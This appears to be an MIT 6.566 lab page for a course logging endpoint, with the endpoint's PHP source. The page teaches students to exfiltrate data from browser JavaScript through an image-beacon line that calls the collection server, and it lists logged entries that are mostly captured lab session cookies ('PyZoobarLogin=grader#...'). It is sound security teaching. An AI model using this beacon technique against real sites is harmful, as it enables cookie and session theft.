You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.566/2026/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Sun, 26 Apr 2026 20:05:29 +0000: aarushim: grader/LFNHJTDKTGMQ Sun, 26 Apr 2026 20:05:22 +0000: aarushim: grader/ZXBOMQOBRMAJ Sun, 26 Apr 2026 20:04:54 +0000: aarushim: PyZoobarLogin=grader#a39ac16788febcfe80e609d51f31916044ba599b8d1c4a2b5eb050b554fc75ea Sun, 26 Apr 2026 20:04:46 +0000: aarushim: PyZoobarLogin=grader#2966fc8767c0b6057954f7544f854b25422e28dc398833dfd1c64e02bb374cd0 Sun, 26 Apr 2026 20:04:30 +0000: aarushim: PyZoobarLogin=grader#6b74a2709587567574465b80c978d2bbd3cb26244b8362330655267db0310397 Sun, 26 Apr 2026 19:32:21 +0000: aarushim: grader/YQDXERMQASDV Sun, 26 Apr 2026 19:32:14 +0000: aarushim: grader/QFCRMEBRBEVL Sun, 26 Apr 2026 19:31:45 +0000: aarushim: PyZoobarLogin=grader#ea820112216f11faeb2f54f0d728b4cc5f6a0478387f2e54825921fc3c4c58ea Sun, 26 Apr 2026 19:31:37 +0000: aarushim: PyZoobarLogin=grader#267ac53dc5313aced11a38a81c44e5e14dbadd011799eb9e3438a053d8509225 Sun, 26 Apr 2026 19:31:21 +0000: aarushim: PyZoobarLogin=grader#8dbb9720661d06018a5d180aab89566303b696c894e28ae99ec8b091cdff2b7d Sun, 26 Apr 2026 05:01:57 +0000: aarushim: grader/QWEDXZYWOHEH Sun, 26 Apr 2026 05:01:49 +0000: aarushim: grader/BMEHYBXLQFTI Sun, 26 Apr 2026 05:01:23 +0000: aarushim: PyZoobarLogin=grader#294bf0eb53443d1dc84c712fcb1b56c7322d725636b8857e59ca96d875431b23 Sun, 26 Apr 2026 05:01:15 +0000: aarushim: PyZoobarLogin=grader#85c20f3018ddf3ed876707d2d0ccbf312355a5c805c671e5d80ba66d0f78fa4b Sun, 26 Apr 2026 05:00:57 +0000: aarushim: PyZoobarLogin=grader#dc2d5c0a8a736ed88fcfe4400d3c395f0df64e07ca5038b9d24b44fd395dbcf3 Sun, 26 Apr 2026 04:42:10 +0000: aarushim: grader/EIGIQFWJVLBS Sun, 26 Apr 2026 04:42:03 +0000: aarushim: grader/DSFJFZWRFTWZ Sun, 26 Apr 2026 04:41:37 +0000: aarushim: PyZoobarLogin=grader#c144888cbb6f22d70f8475186511ef6fb3e0671bdde9f5a76280de6202f20336 Sun, 26 Apr 2026 04:41:30 +0000: aarushim: PyZoobarLogin=grader#3afbbb2a273ab037d75ceea2c176028df3461dd334968c466431b1b68bba71ce Sun, 26 Apr 2026 04:41:14 +0000: aarushim: PyZoobarLogin=grader#9a417c68f3425b5f41fdf50a28f87e5b21fd595f2aafbcd19678cc2950d5fc75 Sun, 26 Apr 2026 03:40:52 +0000: aarushim: grader/ERRQYQXDUYSL Sun, 26 Apr 2026 03:33:15 +0000: aarushim: grader/TRLRAPGKIGHX Sun, 26 Apr 2026 02:27:53 +0000: aarushim: PyZoobarLogin=grader#56a33fb44ac6d8ebc1019acc917b379cb41b6bd5944459bba249cc28a092a964 Sun, 26 Apr 2026 02:27:46 +0000: aarushim: PyZoobarLogin=grader#1da042b49a5f762169a7ed9a3fb05dfb3f41dbeb40602160c41901958df729bd Sun, 26 Apr 2026 02:27:30 +0000: aarushim: PyZoobarLogin=grader#c98bf7461037d3baeb05f118faabac4e1dca5e0ce04901316366cc9a36fd8103 Sat, 25 Apr 2026 21:23:05 +0000: jamielim: grader/DIPIUQLNEYAY Sat, 25 Apr 2026 21:22:57 +0000: jamielim: grader/GMEDUFEPMGHY Sat, 25 Apr 2026 21:22:30 +0000: jamielim: PyZoobarLogin=grader#c9237e1326fdca68bec5ff10cc8889783930d26283475ae4d95ddc0e33326e2d Sat, 25 Apr 2026 21:22:22 +0000: jamielim: PyZoobarLogin=grader#828b1945a817df6110225f5a8fed07a04129193ffd8420aa216b11cf4dcaa424 Sat, 25 Apr 2026 21:22:06 +0000: jamielim: PyZoobarLogin=grader#b6138cd05f209860765e752d7cfcb93422185ebee4118ad452e0f1ccc9c5f43e Sat, 25 Apr 2026 21:12:39 +0000: jamielim: grader/PMYBOYAWZHXI Sat, 25 Apr 2026 21:12:32 +0000: jamielim: grader/RALZYZPOGIBO Sat, 25 Apr 2026 21:12:06 +0000: jamielim: PyZoobarLogin=grader#09574d5b0d0ad8ca69cdd2f1af9ba4ab2d0fb589bfda26cbdf8fafea0f053831 Sat, 25 Apr 2026 21:11:58 +0000: jamielim: PyZoobarLogin=grader#b5ece6faaf2cacd37dffe78357684548602c83353519522f01e82b857526ae79 Sat, 25 Apr 2026 21:11:44 +0000: jamielim: PyZoobarLogin=grader#b0c8a71fec7800c2f7a193fc876235210d0ca7479a5182b105665fa513699fb0 Sat, 25 Apr 2026 21:02:01 +0000: mapleint: grader/UAMZPFEPBYBM Sat, 25 Apr 2026 21:01:48 +0000: mapleint: grader/PQTJBRIIEYSY Sat, 25 Apr 2026 21:01:41 +0000: mapleint: grader/XXTMISWGLAUJ Sat, 25 Apr 2026 21:01:14 +0000: idfk: PyZoobarLogin=grader#7e19f40ca4f19bebc1ec6736ab939370ed98286c96f6684a0b86f58d6c207f35 Sat, 25 Apr 2026 21:01:06 +0000: idfk: PyZoobarLogin=grader#4efdee6e5c71d6961cc27b9d5df3a39fabba3ea8b7dabf9f99707041e7cd8d95 Sat, 25 Apr 2026 21:00:49 +0000: idfk: PyZoobarLogin=grader#7376d351e058fba7dd64f5fe29244a826c52581ea5fca3834b150c2032d44107 Sat, 25 Apr 2026 19:40:41 +0000: jamielim: grader/YDHSGTLMFSOD Sat, 25 Apr 2026 19:40:36 +0000: jamielim: grader/LMZXBPZMUOHB Sat, 25 Apr 2026 19:40:11 +0000: jamielim: PyZoobarLogin=grader#0df9be864683436873602dc7713d11ee0236345d49a8b215f54bc3dac88ab608 Sat, 25 Apr 2026 19:40:04 +0000: jamielim: PyZoobarLogin=grader#819e92a88454b0f216bc840ea0d0eda50e854e965eb723fa6c7ad0e0de2acd1f Sat, 25 Apr 2026 19:39:50 +0000: jamielim: PyZoobarLogin=grader#5e7a77063e4903d5cb2615a50790ea5ce8dac2620bdb0508b019264592c05a0e Sat, 25 Apr 2026 19:38:25 +0000: fedaa: grader/KQKKYOKDCCVQ Sat, 25 Apr 2026 19:38:18 +0000: fedaa: grader/LMBHAHYXMYWM Sat, 25 Apr 2026 19:37:50 +0000: fedaa: PyZoobarLogin=grader#203098c9b2216d6b541139010e9bc976ba766bc09ed1d4c8b1b3332afe7f9c62 Sat, 25 Apr 2026 19:37:43 +0000: fedaa: PyZoobarLogin=grader#288d85c82caaf5a1705dc82c2b6858e13ef8d022338e42a82e76620b523f6856 Sat, 25 Apr 2026 19:37:27 +0000: fedaa: PyZoobarLogin=grader#c65fee14dd53be2312d644a9ffc401b9833297ebe7e5f851244a8bb9a06a07a8 Sat, 25 Apr 2026 19:34:41 +0000: kayli195: grader/KXPUFMNZSTUC Sat, 25 Apr 2026 19:34:34 +0000: kayli195: grader/ZKLGBDNJZIIY Sat, 25 Apr 2026 19:34:07 +0000: kayli195: PyZoobarLogin=grader#939f392092c5d10e0e797db5c6002d36affeec7cf483d96508a1cf9f3c642d11 Sat, 25 Apr 2026 19:33:59 +0000: kayli195: PyZoobarLogin=grader#2e8dacf7c0c30e1bfc41564f77725a81e0a58f7803f6ba9fa54e1d27d35bb4d1 Sat, 25 Apr 2026 19:33:43 +0000: kayli195: PyZoobarLogin=grader#25ef0697aff0f3ee15a5bee32558cc22f70613230c8b88f66edc19e9dae62434 Sat, 25 Apr 2026 19:16:01 +0000: mapleint: grader/QKUFQVAATZNY Sat, 25 Apr 2026 19:15:48 +0000: mapleint: grader/IIRCHRFMNAFI Sat, 25 Apr 2026 19:15:41 +0000: mapleint: grader/QOFTMOWHABNM Sat, 25 Apr 2026 19:15:14 +0000: idfk: PyZoobarLogin=grader#bc5bc27545febe7255db0a84f627f227ce84158eee0d9a6256cd003642dcc6a1 Sat, 25 Apr 2026 19:15:07 +0000: idfk: PyZoobarLogin=grader#ccfdacae7d7ade7080c726aee0036d7194e23dbe877eebcc2f65f6c2144e0b5b Sat, 25 Apr 2026 19:14:51 +0000: idfk: PyZoobarLogin=grader#7588c7be51ac21f098c95c27a6b06cb6d89758f2eb17fe67b61ffad03b9e92db Sat, 25 Apr 2026 18:46:20 +0000: mapleint: grader/DPPZYMDGQUWZ Sat, 25 Apr 2026 18:45:59 +0000: mapleint: grader/SITOFIIZGYDB Sat, 25 Apr 2026 18:45:45 +0000: mapleint: grader/LRBKAOPLPAWC Sat, 25 Apr 2026 13:58:47 +0000: marpham: grader/WMVJKVJSFLCC Sat, 25 Apr 2026 13:58:40 +0000: marpham: grader/HWFAOSIDNOLZ Sat, 25 Apr 2026 13:58:12 +0000: marpham: PyZoobarLogin=grader#3e929d2c77f6fd3e6aaa5354319506dd1557be5c5e33be39d30017b6912688b8 Sat, 25 Apr 2026 13:58:04 +0000: marpham: PyZoobarLogin=grader#57cb60b9f3f9fca3ec78adab0fb21244c9e23af9d422acc39548ebc51bed8e6b Sat, 25 Apr 2026 13:57:47 +0000: marpham: PyZoobarLogin=grader#a20ac9fec9ac3170f8bf5cd032dd0ba338cdf7c6e0d15b561931322cd454e530 Sat, 25 Apr 2026 13:51:01 +0000: marpham: grader/JDWSKUFMFWLM Sat, 25 Apr 2026 13:50:53 +0000: marpham: grader/UMPACVLEXSQL Sat, 25 Apr 2026 13:50:18 +0000: marpham: PyZoobarLogin=grader#1bd40da929efad8396e2fa357996a6231ca57173c0a60cb011ce07ab1e7e378a Sat, 25 Apr 2026 13:50:09 +0000: marpham: PyZoobarLogin=grader#32b07580837c07d30e7eb2872d8039d640bdd6df69e0576c131031d99028ae4d Sat, 25 Apr 2026 13:49:52 +0000: marpham: PyZoobarLogin=grader#d4b3f3eed8f13695c936907578c6aa521eb80af24778be58c76bbc10560b79fd Sat, 25 Apr 2026 05:32:30 +0000: marpham: grader/YSAAYQCZPSHG Sat, 25 Apr 2026 05:32:23 +0000: marpham: grader/GYMRJQTMDFCT Sat, 25 Apr 2026 05:31:57 +0000: marpham: PyZoobarLogin=grader#cdbad050d2383ed24c055ac1b3480f68e0e9634409a6d1e13f7f0c5940228cd8 Sat, 25 Apr 2026 05:31:49 +0000: marpham: PyZoobarLogin=grader#1827941a7b4cfec271dd459fc54944bd82f45e308649f7a63edefe2a44cedf9c Sat, 25 Apr 2026 05:31:33 +0000: marpham: PyZoobarLogin=grader#86c9e745b0c00d1d32568e55eda485842eafb459f4dc992a7d26aba19a60cc52 Sat, 25 Apr 2026 05:28:57 +0000: marpham: grader/VNSNFBWXEMAS Sat, 25 Apr 2026 05:28:49 +0000: marpham: grader/CUXHCOJNBJUR Sat, 25 Apr 2026 05:28:11 +0000: marpham: PyZoobarLogin=grader#4cec3f8dea1c769d0c1a88788af9567949b36675cc3bdc31d80a150ac2668070 Sat, 25 Apr 2026 05:28:03 +0000: marpham: PyZoobarLogin=grader#fa8d42ff74f2fcefdb77036ed16f706acfc53ddf0454229022e5980ec08eec2e Sat, 25 Apr 2026 05:27:46 +0000: marpham: PyZoobarLogin=grader#f16e873a92198a06c3d322b0bcdfd24525641d9bab2084e2f4dfceac94f2ec9a Sat, 25 Apr 2026 05:27:35 +0000: marpham: grader/FEMQPVYWMZHO Sat, 25 Apr 2026 05:27:28 +0000: marpham: grader/PBUMUHGMNGAR Sat, 25 Apr 2026 05:26:59 +0000: marpham: PyZoobarLogin=grader#b5cacb31aacbccfc77a92e4e216c807e60015a65fb4086c69b163b8962e70d54 Sat, 25 Apr 2026 05:26:51 +0000: marpham: PyZoobarLogin=grader#17fb7aee7715b20e3b221326be55b82a9e3af66d15307a7a88edd6b6f4359057 Sat, 25 Apr 2026 05:26:35 +0000: marpham: PyZoobarLogin=grader#563effc464f17706efa2f1972a7bff888b58e47b8ef19ea038296e5330b570eb Sat, 25 Apr 2026 05:24:09 +0000: marpham: grader/BNZWJCAGWSRM Sat, 25 Apr 2026 05:24:01 +0000: marpham: grader/BBRGQIONNBJN Sat, 25 Apr 2026 05:23:22 +0000: marpham: PyZoobarLogin=grader#601f9431533a47a4a7564187f18e472c1afb2704553299ce1a2d6b65b47696c4 Sat, 25 Apr 2026 05:23:14 +0000: marpham: PyZoobarLogin=grader#c3f1b94e8c84117dd6175e00b66f969d25a8e29151f37d4ff9e1be43fc71191f Sat, 25 Apr 2026 05:22:57 +0000: marpham: PyZoobarLogin=grader#dd5e2c07c23d2d9ebf65a2e48e76321ac3357dd1c45b70441c54842cb140e2fd Sat, 25 Apr 2026 05:16:24 +0000: marpham: grader/BKADDAMXBOQZ Sat, 25 Apr 2026 05:16:11 +0000: marpham: grader/DTGWJYBFPKKH Sat, 25 Apr 2026 05:15:34 +0000: marpham: PyZoobarLogin=grader#56c5c8a7e7af41519d2fe643ebe7c1a8a0ad24d50b346b1b0a26052d97e8e92f Sat, 25 Apr 2026 05:15:27 +0000: marpham: PyZoobarLogin=grader#6ff6a5dd1bf064a9f5bd7a3a4dac3d3e3e5ac20d0e9b68ed8dc7fd5d0747bd1d Sat, 25 Apr 2026 05:15:10 +0000: marpham: PyZoobarLogin=grader#0b95225db7fdd02959dc295d82bc2c8ee2df88204139e9bb21bafaf955be9848 Sat, 25 Apr 2026 05:14:22 +0000: marpham: grader/BSWXHNUMIGMV
In case you are curious, here is the source code of this page.
<?php header("Access-Control-Allow-Origin: *"); do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.566-2026-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.566/2026/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.566-2026-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>